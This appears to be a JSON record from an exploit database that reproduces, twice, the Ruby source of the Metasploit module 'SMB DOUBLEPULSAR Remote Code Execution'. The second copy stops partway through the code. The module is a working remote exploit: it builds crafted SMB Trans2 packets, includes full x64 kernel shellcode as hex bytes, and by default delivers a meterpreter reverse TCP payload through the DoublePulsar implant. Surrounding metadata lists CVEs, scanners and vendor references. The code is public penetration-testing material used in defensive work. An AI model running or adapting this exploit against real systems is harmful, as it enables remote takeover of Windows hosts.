"1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-12T16:01:04", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "87ca22fd843673ff2ae5372d0047960d", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-07-12T16:01:04", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 115}, "differentElements": ["published"], "edition": 69, "lastseen": "2020-07-12T16:01:04"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-06-23T07:32:07", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-23T07:32:07", "rev": 2, "value": 7.8, "vector": "NONE"}}, "hash": "b9e474fffe92441ab5fb7c9462a227a4", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-06-23T07:32:07", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 